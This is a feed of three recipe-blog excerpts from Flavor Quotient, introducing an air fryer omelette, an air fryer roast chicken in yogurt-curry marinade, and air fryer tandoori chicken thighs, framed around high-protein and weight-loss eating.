Today I will show you how you can make a healthy breakfast absolutely hassle-free in this magic device! Hence enters my fantastic air fryer omelette!
What is air fryer omelette and why is it so viral now?
I will be honest with you! I didnβt suddenly come up with the idea of this air fryer omelette recipe on my own which may already be very obvious to you as this is everywhere on the internet!
A quick search on trending air fryer recipes got me hooked on this one and then I developed my own version of air fryer omelette after scanning through a dozen.
This air fryer version of omelette is significantly different from your regular frying pan version made on the stovetop. The major difference is in their texture.
Air fryer omelette comes out super fluffy because we use 6 to 7 eggs which make multiple servings at one go (an absolute win-win!) and it becomes thick yet succulent inside thanks to the convection cooking technique of air fryers.
But I think what made this omelette so viral is the versatility of this recipe! You can make your own custom-made omelette with your own choice of veggies making it look extremely pretty!
I am already thinking of other variations of this that I am going to make soon!
The post Easy Air Fryer Omelette | Delicious Air Fryer Omelette Recipe for Weight Loss first appeared on Flavor Quotient.
In my quest to look for new recipes that fit to my high protein meal plans, I made this air fryer roast chicken in a curry powder-yogurt marinade and it turned out to be the most hassle-free yet best tasting roast chicken ever!
After sharing a number of air fryer chicken recipes using all different types of marinades, this time I was a little confused about what to share next that will be different as well as exciting!
Air fryer has proved to be my savior so many times in the last 2 years that I have literally lost count of it. Thatβs why I keep searching for new & innovative air fryer recipes to keep my repertoire updated real time.
So here comes the air fryer roast chicken which is unlike any roast chicken recipe that I have shared till date! It is also a beginner-friendly recipe with just a handful of ingredients.
This air fryer roast chicken is a must-have for your collection as you can easily churn it out in under 40 minutes; a perfect weeknight dinner for the whole family!
What is Air Fryer Roast Chicken in Yogurt-Curry Marinade?
This roast chicken in yogurt-curry marinade is my successful attempt to bring together all the quintessential Indian flavors in an air fryer roast chicken recipe without the hassle of remembering a long list of spices!
I can absolutely understand that making Indian dishes can be confusing as most of the time it involves a host of ingredients. But not this one!
This air fryer roast chicken is a spot-on recipe for all Indian food lovers across the world who love our food but are intimidated by the length of the ingredient list!
The post High Protein Air Fryer Roast Chicken | Air Fryer Chicken Recipe for Weight Loss first appeared on Flavor Quotient.
Ditch the chicken breasts today and make these insanely delicious yet easy to make tandoori chicken thighs for dinner tonight as these are perfect to make quickly on a busy weeknight!
Out of many things that my fitness journey taught me, prioritizing protein was one key learning! That's exactly why you see so many chicken recipes here in my space as being a meat eater, chicken is my go-to choice of protein!
So here I am again today with another chicken recipe which can ease out your stress of what to make for dinner on a hectic work day, that of course only if you are a chicken lover like us!
I would like to call these tandoori chicken thighs my own innovation as I have never seen these anywhere on the internet and it materialized in a purely organic way when I was planning for my high protein dinner options.
What are tandoori chicken thighs?
Chicken thighs are undoubtedly my most favorite portion of chicken, so I keep thinking of newer & innovative ways to make and devour this tender and succulent meaty portion of the bird.
And what could be better than a tandoori flavored chicken thigh! My tandoori chicken thighs are a simple spin-off of my most popular restaurant style tandoori chicken recipe.
Instead of using the typical cuts of a full chicken which is how a traditional tandoori chicken is made, I used boneless & skinless chicken thighs to make my weekday version of tandoori chicken!
The post Tandoori Chicken Thighs in Air Fryer | My Innovative Air Fryer Chicken Recipe for Weight Loss first appeared on Flavor Quotient.
